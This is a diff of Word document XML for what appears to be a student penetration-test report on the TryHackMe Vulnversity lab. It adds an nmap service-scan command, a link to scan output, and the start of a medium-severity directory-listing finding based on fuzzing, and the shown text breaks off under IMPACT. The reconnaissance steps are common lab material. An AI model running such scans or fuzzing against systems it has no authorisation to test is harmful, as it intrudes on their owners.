-      <w:bookmarkStart w:id="17" w:name="_Information_Disclosure"/>
-      <w:bookmarkEnd w:id="17"/>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Just use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> command to scan the network </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:szCs w:val="24"/>
           <w:lang w:bidi="ar-EG"/>
         </w:rPr>
-        <w:t>see whoami on the system by this command 'whoami'</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>We used</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2509,11 +3314,247 @@
           <w:szCs w:val="24"/>
           <w:lang w:bidi="ar-EG"/>
         </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D13BEB6" wp14:editId="125ECDC5">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>center</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>11430</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2581275" cy="295275"/>
+                <wp:effectExtent l="0" t="0" r="28575" b="28575"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1896454009" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2581275" cy="295275"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>nmap</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> -</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>sV</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> -A &lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>ip</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>&gt; -</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>oX</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> &lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>outputfile</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="0D13BEB6" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.9pt;width:203.25pt;height:23.25pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>nmap</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> -</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>sV</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> -A &lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>ip</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>&gt; -</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>oX</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> &lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>outputfile</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="ar-EG"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="ar-EG"/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47EA4F4B" wp14:editId="4D5BFAC0">
-            <wp:extent cx="2476846" cy="552527"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="793270536" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E6A3415" wp14:editId="43A31919">
+            <wp:extent cx="5943600" cy="2816860"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="614606136" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2521,11 +3562,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="793270536" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPr id="614606136" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId14" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2539,7 +3580,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2476846" cy="552527"/>
+                      <a:ext cx="5943600" cy="2816860"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2555,44 +3596,829 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7599F84C" wp14:editId="2EA4581A">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="page">
+                  <wp:posOffset>742950</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>333375</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="6381750" cy="257175"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1190346437" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6381750" cy="257175"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:keepNext/>
+                              <w:ind w:left="465"/>
+                            </w:pPr>
+                            <w:hyperlink r:id="rId15" w:history="1">
+                              <w:r>
+                                <w:rPr>
+                                  <w:rStyle w:val="Hyperlink"/>
+                                </w:rPr>
+                                <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/recon/nmap-output.txt</w:t>
+                              </w:r>
+                            </w:hyperlink>
+                          </w:p>
+                          <w:p/>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="7599F84C" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:58.5pt;margin-top:26.25pt;width:502.5pt;height:20.25pt;z-index:251665408;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:keepNext/>
+                        <w:ind w:left="465"/>
+                      </w:pPr>
+                      <w:hyperlink r:id="rId16" w:history="1">
+                        <w:r>
+                          <w:rPr>
+                            <w:rStyle w:val="Hyperlink"/>
+                          </w:rPr>
+                          <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/recon/nmap-output.txt</w:t>
+                        </w:r>
+                      </w:hyperlink>
+                    </w:p>
+                    <w:p/>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="page"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">You can check the output file </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>on :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:noProof/>
+          <w:color w:val="E97132" w:themeColor="accent2"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Information_Disclosure"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc215079552"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc186041944"/>
+      <w:bookmarkEnd w:id="18"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="E97132" w:themeColor="accent2"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Directory Listing / Directory Exposure</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="PlainTable1"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2875"/>
+        <w:gridCol w:w="6475"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="467"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Severity </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="431"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:t>CVSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:hyperlink r:id="rId17" w:anchor="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>CVSS 5.3</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="440"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Affected Assets</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId18" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://tryhackme.com/room/vulnversity</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="422"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rtl/>
+                <w:lang w:bidi="ar-EG"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:bidi="ar-EG"/>
+              </w:rPr>
+              <w:t>Reference</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:hyperlink r:id="rId19" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://portswigger.net/kb/issues/00600100_directory-listing</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Description</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We tried to make our attack surface wider through directory listing (fuzzing) and we exposed some endpoints on the webapp with interactive functions </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+      <w:r>
+        <w:t>IMPACT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>An attacker can exploit this vulnerability to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
